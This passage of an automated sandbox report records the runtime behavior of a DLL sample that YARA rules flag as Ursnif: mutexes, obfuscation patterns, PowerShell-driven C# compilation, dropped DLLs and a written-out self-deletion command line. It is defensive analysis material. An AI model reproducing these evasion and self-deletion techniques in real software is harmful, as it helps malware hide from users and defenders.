Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B50929 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle, 1_2_04B50929
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{4C2EA160-3B95-5E09-2540-9F72297443C6}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F4BA931B-C3A9-4644-ED68-A7DA711CCBAE}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{4CEDA2E1-3B48-5E20-2540-9F72297443C6}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{A476835D-B351-766B-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2796:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3640:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A405E674-B394-76D2-5D18-970AE1CCBBDE}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{847E04E4-13F8-561E-BDF8-F7EA41AC1BBE}
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: 61ee6edf7de65.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: 61ee6edf7de65.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdb source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000001.00000003.462332100.0000000005180000.00000004.00000001.sdmp, loaddll32.exe, 00000001.00000003.450119700.00000000050C0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.439767157.0000000005FD0000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.435425183.0000000005F10000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.pdbpsd1 source: powershell.exe, 0000000D.00000003.464647670.00000288719D5000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.pdbXP%a source: powershell.exe, 0000000D.00000002.1155485943.000002885CC78000.00000004.00000001.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E29D5 push ecx; retf 1_2_032E29D6
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E620A push 3AC006C0h; ret 1_2_032E620F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E5A01 push 8B514074h; retf 1_2_032E5A06
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E501E pushad ; iretd 1_2_032E501F
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E301A push es; retf 1_2_032E302C
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_032E561B push edi; ret 1_2_032E5625
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B57347 push ecx; ret 1_2_04B57357
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F280BF push ecx; ret 3_2_00F280CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F27D50 push ecx; ret 3_2_00F27D59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3561B push edi; ret 3_2_00F35625
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3301A push es; retf 3_2_00F3302C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3501E pushad ; iretd 3_2_00F3501F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F35A01 push 8B514074h; retf 3_2_00F35A06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F3620A push 3AC006C0h; ret 3_2_00F3620F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00F329D5 push ecx; retf 3_2_00F329D6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A06DD0 push ecx; ret 3_2_05A06DD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_05A07347 push ecx; ret 3_2_05A07357
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_04B4653E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_04B4653E
PE file contains an invalid checksum
Source: 32ysuxeg.dll.19.dr Static PE information: real checksum: 0x0 should be: 0xff6f
Source: 61ee6edf7de65.dll Static PE information: real checksum: 0x201ff should be: 0x2296e
Source: vn3zgr4g.dll.24.dr Static PE information: real checksum: 0x0 should be: 0x1abd
Source: hddjt5kh.dll.14.dr Static PE information: real checksum: 0x0 should be: 0xbe6e
Source: qmanv25g.dll.20.dr Static PE information: real checksum: 0x0 should be: 0x4532
Compiles C# or VB.Net code
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline Jump to behavior

Persistence and Installation Behavior
barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.385104161.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359568367.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384820134.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472405991.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359628903.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.365461570.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.584670916.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359660844.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384544638.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384666912.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445277854.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445091094.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385135380.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.445408460.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359611045.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.376576771.0000000004FCC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384983299.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359512157.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000003.444990787.000002ACC595C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.384911047.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359647508.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.428738020.0000000005EF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.385049802.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472502458.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472298096.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.393830372.0000000003C6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000003.472531811.0000023ACE15C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359541703.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.359590748.00000000051C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.445031558.00000000050A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 912, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4824, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6104, type: MEMORYSTR
Self deletion via cmd delete
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
